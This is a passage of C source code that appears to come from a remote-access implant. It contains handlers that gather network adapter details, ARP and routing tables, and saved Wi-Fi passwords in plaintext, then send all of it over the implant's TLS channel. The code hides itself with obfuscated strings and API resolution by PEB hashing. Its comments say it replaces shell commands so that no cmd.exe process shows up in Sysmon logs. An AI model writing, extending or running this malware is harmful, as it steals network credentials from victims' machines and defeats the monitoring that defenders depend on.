        int ll = _snprintf(line, sizeof(line)-1,
            "\n%s (%s):\n  MAC: %02X-%02X-%02X-%02X-%02X-%02X\n",
            p->AdapterName, friendlyName,
            p->PhysicalAddress[0], p->PhysicalAddress[1], p->PhysicalAddress[2],
            p->PhysicalAddress[3], p->PhysicalAddress[4], p->PhysicalAddress[5]);
        if (ll > 0 && (size_t)(off + ll + 2) < bufSize) {
            memcpy(out + off, line, ll); off += ll;
        }

        for (PIP_ADAPTER_UNICAST_ADDRESS ua = p->FirstUnicastAddress; ua; ua = ua->Next) {
            char addrBuf[64] = {0};
            DWORD addrLen = sizeof(addrBuf) - 1;
            WSAAddressToStringA(ua->Address.lpSockaddr, ua->Address.iSockaddrLength,
                                NULL, addrBuf, &addrLen);
            ll = _snprintf(line, sizeof(line)-1, "  IP: %s\n", addrBuf);
            if (ll > 0 && (size_t)(off + ll + 2) < bufSize) {
                memcpy(out + off, line, ll); off += ll;
            }
        }
    }
    free(pAddrs);
    out[off] = '\0';
    if (off > 0) tls_send_msg(pTls, (const BYTE *)out, (DWORD)off);
    else         _send_str(pTls, "(no adapters)");
    free(out);
}


/* ── _handle_arp ──────────────────────────────────────────────────────────── */
/*
 * Replaces: _shell_exec(pTls, "arp -a 2>&1")
 * API: GetIpNetTable2 (iphlpapi.dll, Vista+)
 */
void _handle_arp(TLS_CONTEXT *pTls)
{
    typedef DWORD (WINAPI *GetIpNetTable2_t)(ADDRESS_FAMILY, PMIB_IPNET_TABLE2 *);
    PVOID hIph = peb_get_module(peb_hash_str(OBF_S(_e_c05a06, 13)));
    if (!hIph) {
        typedef HMODULE (WINAPI *pLL_t)(LPCSTR);
        PVOID hK32a = peb_get_module(peb_hash_str(OBF_S(_e_eb1ec7, 13)));
        pLL_t pLLa = hK32a ? (pLL_t)(void *)peb_get_export(hK32a, peb_hash_str(OBF_S(_e_e89270, 13))) : NULL;
        if (pLLa) { char _dlln[16]; SLIT_BUF(_dlln, sizeof(_dlln), OBF_S(_e_c05a06, 13)); pLLa(_dlln); }
        hIph = peb_get_module(peb_hash_str(OBF_S(_e_c05a06, 13)));
    }
    if (!hIph) { _send_str(pTls, "[-] arp: iphlpapi not available"); return; }

    GetIpNetTable2_t pFn = (GetIpNetTable2_t)peb_get_export(hIph, peb_hash_str(OBF_S(_e_146df1, 15)));
    if (!pFn) { _send_str(pTls, "[-] arp: GetIpNetTable2 not found (need Vista+)"); return; }

    typedef void (WINAPI *FreeMibTable_t)(PVOID);
    FreeMibTable_t pFree = (FreeMibTable_t)peb_get_export(hIph, peb_hash_str(OBF_S(_e_df4be7, 13)));

    PMIB_IPNET_TABLE2 tbl = NULL;
    if (pFn(AF_INET, &tbl) != NO_ERROR || !tbl) {
        _send_str(pTls, "[-] arp: GetIpNetTable2 failed"); return;
    }

    size_t bufSize = 16384;
    char  *out = (char *)malloc(bufSize);
    if (!out) { if (pFree) pFree(tbl); _send_str(pTls, "[-] arp: OOM"); return; }
    int off = _snprintf(out, bufSize - 1,
        "  %-20s %-20s %s\n  %-20s %-20s %s\n",
        "Internet Address", "Physical Address", "IfIndex",
        "----------------", "----------------", "-------");
    if (off < 0) off = 0;

    for (ULONG i = 0; i < tbl->NumEntries; i++) {
        MIB_IPNET_ROW2 *r = &tbl->Table[i];
        if (r->Address.si_family != AF_INET) continue;
        struct in_addr a; a.S_un.S_addr = r->Address.Ipv4.sin_addr.S_un.S_addr;
        char ip[20]; _snprintf(ip, sizeof(ip)-1, "%s", inet_ntoa(a));
        char mac[24]; _snprintf(mac, sizeof(mac)-1,
            "%02X-%02X-%02X-%02X-%02X-%02X",
            r->PhysicalAddress[0], r->PhysicalAddress[1], r->PhysicalAddress[2],
            r->PhysicalAddress[3], r->PhysicalAddress[4], r->PhysicalAddress[5]);
        char line[100];
        int ll = _snprintf(line, sizeof(line)-1, "  %-20s %-20s %lu\n",
                           ip, mac, (unsigned long)r->InterfaceIndex);
        if (ll > 0 && (size_t)(off + ll + 2) < bufSize) {
            memcpy(out + off, line, ll); off += ll;
        }
    }
    if (pFree) pFree(tbl);
    out[off] = '\0';
    tls_send_msg(pTls, (const BYTE *)out, (DWORD)off);
    free(out);
}


/* ── _handle_routes ───────────────────────────────────────────────────────── */
/*
 * Replaces: _shell_exec(pTls, "route print 2>&1")
 * API: GetIpForwardTable2 (iphlpapi.dll, Vista+)
 */
void _handle_routes(TLS_CONTEXT *pTls)
{
    typedef DWORD (WINAPI *GetIpForwardTable2_t)(ADDRESS_FAMILY, PMIB_IPFORWARD_TABLE2 *);
    typedef void  (WINAPI *FreeMibTable_t)(PVOID);

    PVOID hIph = peb_get_module(peb_hash_str(OBF_S(_e_c05a06, 13)));
    if (!hIph) {
        typedef HMODULE (WINAPI *pLL_t)(LPCSTR);
        PVOID hK32r = peb_get_module(peb_hash_str(OBF_S(_e_eb1ec7, 13)));
        pLL_t pLLr = hK32r ? (pLL_t)(void *)peb_get_export(hK32r, peb_hash_str(OBF_S(_e_e89270, 13))) : NULL;
        if (pLLr) { char _dlln[16]; SLIT_BUF(_dlln, sizeof(_dlln), OBF_S(_e_c05a06, 13)); pLLr(_dlln); }
        hIph = peb_get_module(peb_hash_str(OBF_S(_e_c05a06, 13)));
    }
    if (!hIph) { _send_str(pTls, "[-] routes: iphlpapi not available"); return; }

    GetIpForwardTable2_t pFn = (GetIpForwardTable2_t)peb_get_export(hIph,
                                    peb_hash_str(OBF_S(_e_cff9dc, 19)));
    FreeMibTable_t pFree = (FreeMibTable_t)peb_get_export(hIph, peb_hash_str(OBF_S(_e_df4be7, 13)));
    if (!pFn) { _send_str(pTls, "[-] routes: GetIpForwardTable2 not found"); return; }

    PMIB_IPFORWARD_TABLE2 tbl = NULL;
    if (pFn(AF_INET, &tbl) != NO_ERROR || !tbl) {
        _send_str(pTls, "[-] routes: GetIpForwardTable2 failed"); return;
    }

    size_t bufSize = 32768;
    char  *out = (char *)malloc(bufSize);
    if (!out) { if (pFree) pFree(tbl); _send_str(pTls, "[-] routes: OOM"); return; }
    int off = _snprintf(out, bufSize - 1,
        "  %-18s %-18s %-18s %-8s %s\n  %-18s %-18s %-18s %-8s %s\n",
        "Destination", "Mask/PrefixLen", "Gateway", "IfIdx", "Metric",
        "-----------", "--------------", "-------", "-----", "------");
    if (off < 0) off = 0;

    for (ULONG i = 0; i < tbl->NumEntries; i++) {
        MIB_IPFORWARD_ROW2 *r = &tbl->Table[i];
        if (r->DestinationPrefix.Prefix.si_family != AF_INET) continue;

        struct in_addr dst, gw;
        dst.S_un.S_addr = r->DestinationPrefix.Prefix.Ipv4.sin_addr.S_un.S_addr;
        gw.S_un.S_addr  = r->NextHop.Ipv4.sin_addr.S_un.S_addr;

        char dstStr[32], pfxStr[8], gwStr[20];
        _snprintf(dstStr, sizeof(dstStr)-1, "%s", inet_ntoa(dst));
        _snprintf(pfxStr, sizeof(pfxStr)-1, "/%u", r->DestinationPrefix.PrefixLength);
        _snprintf(gwStr,  sizeof(gwStr)-1,  "%s", inet_ntoa(gw));

        char entry[64]; _snprintf(entry, sizeof(entry)-1, "%s%s", dstStr, pfxStr);
        char line[180];
        int ll = _snprintf(line, sizeof(line)-1,
            "  %-18s %-18s %-18s %-8lu %lu\n",
            entry, "", gwStr,
            (unsigned long)r->InterfaceIndex, (unsigned long)r->Metric);
        if (ll > 0 && (size_t)(off + ll + 2) < bufSize) {
            memcpy(out + off, line, ll); off += ll;
        }
    }
    if (pFree) pFree(tbl);
    out[off] = '\0';
    tls_send_msg(pTls, (const BYTE *)out, (DWORD)off);
    free(out);
}


/* ── _handle_wifi_passwords ───────────────────────────────────────────────── */
/*
 * Replaces: _shell_exec(pTls, "for /f ... netsh wlan show profile...")
 * API: WlanOpenHandle + WlanGetProfileList + WlanGetProfile (wlanapi.dll)
 * No cmd.exe, no child process, no for-loop batch command in Sysmon logs.
 */
void _handle_wifi_passwords(TLS_CONTEXT *pTls)
{
    typedef DWORD (WINAPI *WlanOpenHandle_t)(DWORD, PVOID, PDWORD, PHANDLE);
    typedef DWORD (WINAPI *WlanCloseHandle_t)(HANDLE, PVOID);
    typedef DWORD (WINAPI *WlanEnumInterfaces_t)(HANDLE, PVOID, PWLAN_INTERFACE_INFO_LIST *);
    typedef DWORD (WINAPI *WlanGetProfileList_t)(HANDLE, const GUID *, PVOID, PWLAN_PROFILE_INFO_LIST *);
    typedef DWORD (WINAPI *WlanGetProfile_t)(HANDLE, const GUID *, LPCWSTR, PVOID, LPWSTR *, PDWORD, PDWORD);
    typedef VOID  (WINAPI *WlanFreeMemory_t)(PVOID);

    /* Load wlanapi via PEB-resolved LoadLibraryA — removes the IAT entry */
    PVOID hK32w = peb_get_module(peb_hash_str(OBF_S(_e_eb1ec7, 13)));
    typedef HMODULE (WINAPI *pLL_t)(LPCSTR);
    pLL_t pLLw = hK32w ? (pLL_t)(void *)peb_get_export(hK32w, peb_hash_str(OBF_S(_e_e89270, 13))) : NULL;
    HMODULE hWlan = NULL;
    if (pLLw) { char _dlln[16]; SLIT_BUF(_dlln, sizeof(_dlln), OBF_S(_e_a64fcd, 12)); hWlan = pLLw(_dlln); }
    if (!hWlan) { _send_str(pTls, "[-] wifi: wlanapi.dll not available"); return; }

    WlanOpenHandle_t     pOpen   = (WlanOpenHandle_t)    peb_get_export(hWlan, peb_hash_str(OBF_S(_e_8fc28e, 15)));
    WlanCloseHandle_t    pClose  = (WlanCloseHandle_t)   peb_get_export(hWlan, peb_hash_str(OBF_S(_e_e7aee4, 16)));
    WlanEnumInterfaces_t pEnum   = (WlanEnumInterfaces_t)peb_get_export(hWlan, peb_hash_str(OBF_S(_e_2d3977, 19)));
    WlanGetProfileList_t pGetPL  = (WlanGetProfileList_t)peb_get_export(hWlan, peb_hash_str(OBF_S(_e_d327ee, 19)));
    WlanGetProfile_t     pGetP   = (WlanGetProfile_t)    peb_get_export(hWlan, peb_hash_str(OBF_S(_e_af01f1, 15)));
    WlanFreeMemory_t     pFreeM  = (WlanFreeMemory_t)    peb_get_export(hWlan, peb_hash_str(OBF_S(_e_d1f2dd, 15)));

    if (!pOpen || !pClose || !pEnum || !pGetPL || !pGetP || !pFreeM) {
        FreeLibrary(hWlan);
        _send_str(pTls, "[-] wifi: wlanapi exports not found"); return;
    }

    HANDLE hWlanH = NULL;
    DWORD  dwNegVer = 0;
    if (pOpen(2, NULL, &dwNegVer, &hWlanH) != ERROR_SUCCESS || !hWlanH) {
        FreeLibrary(hWlan);
        _send_str(pTls, "[-] wifi: WlanOpenHandle failed"); return;
    }

    PWLAN_INTERFACE_INFO_LIST pIfList = NULL;
    if (pEnum(hWlanH, NULL, &pIfList) != ERROR_SUCCESS || !pIfList) {
        pClose(hWlanH, NULL); FreeLibrary(hWlan);
        _send_str(pTls, "[-] wifi: WlanEnumInterfaces failed"); return;
    }

    size_t bufSize = 65536;
    char  *out = (char *)malloc(bufSize);
    if (!out) {
        pFreeM(pIfList); pClose(hWlanH, NULL); FreeLibrary(hWlan);
        _send_str(pTls, "[-] wifi: OOM"); return;
    }
    int off = 0;

    for (DWORD iface = 0; iface < pIfList->dwNumberOfItems; iface++) {
        PWLAN_PROFILE_INFO_LIST pProfList = NULL;
        if (pGetPL(hWlanH, &pIfList->InterfaceInfo[iface].InterfaceGuid,
                   NULL, &pProfList) != ERROR_SUCCESS || !pProfList)
            continue;

        for (DWORD p = 0; p < pProfList->dwNumberOfItems; p++) {
            LPWSTR pXml = NULL;
            DWORD dwFlags = WLAN_PROFILE_GET_PLAINTEXT_KEY;
            DWORD dwAccess = 0;
            if (pGetP(hWlanH,
                      &pIfList->InterfaceInfo[iface].InterfaceGuid,
                      pProfList->ProfileInfo[p].strProfileName,
                      NULL, &pXml, &dwFlags, &dwAccess) == ERROR_SUCCESS && pXml) {

                /* Extract <name> and <keyMaterial> from the XML */
                char ssid[256] = {0}, key[256] = "(open/no key)";
                WideCharToMultiByte(CP_ACP, 0,
                    pProfList->ProfileInfo[p].strProfileName, -1,
                    ssid, sizeof(ssid)-1, NULL, NULL);

                /* Find keyMaterial tag in the XML */
                const WCHAR *km = wcsstr(pXml, L"<keyMaterial>");
                if (km) {
                    km += 13; /* skip tag */
                    const WCHAR *end = wcsstr(km, L"</keyMaterial>");
                    if (end) {
                        int len = (int)(end - km);
                        if (len > 0 && len < (int)sizeof(key)-1) {
                            WideCharToMultiByte(CP_ACP, 0, km, len,
                                                key, sizeof(key)-1, NULL, NULL);
                            key[len] = '\0';
                        }
                    }
                }
                pFreeM(pXml);

                char line[600];
                int ll = _snprintf(line, sizeof(line)-1,
                    "SSID: %-40s  Key: %s\n", ssid, key);
                if (ll > 0 && (size_t)(off + ll + 2) < bufSize) {
                    memcpy(out + off, line, ll); off += ll;
                }
            }
        }
        pFreeM(pProfList);
    }

    pFreeM(pIfList);
    pClose(hWlanH, NULL);
    FreeLibrary(hWlan);

    out[off] = '\0';
    if (off > 0 && out) tls_send_msg(pTls, (const BYTE *)out, (DWORD)off);
    else         _send_str(pTls, "(no WiFi profiles found)");
    free(out);
}
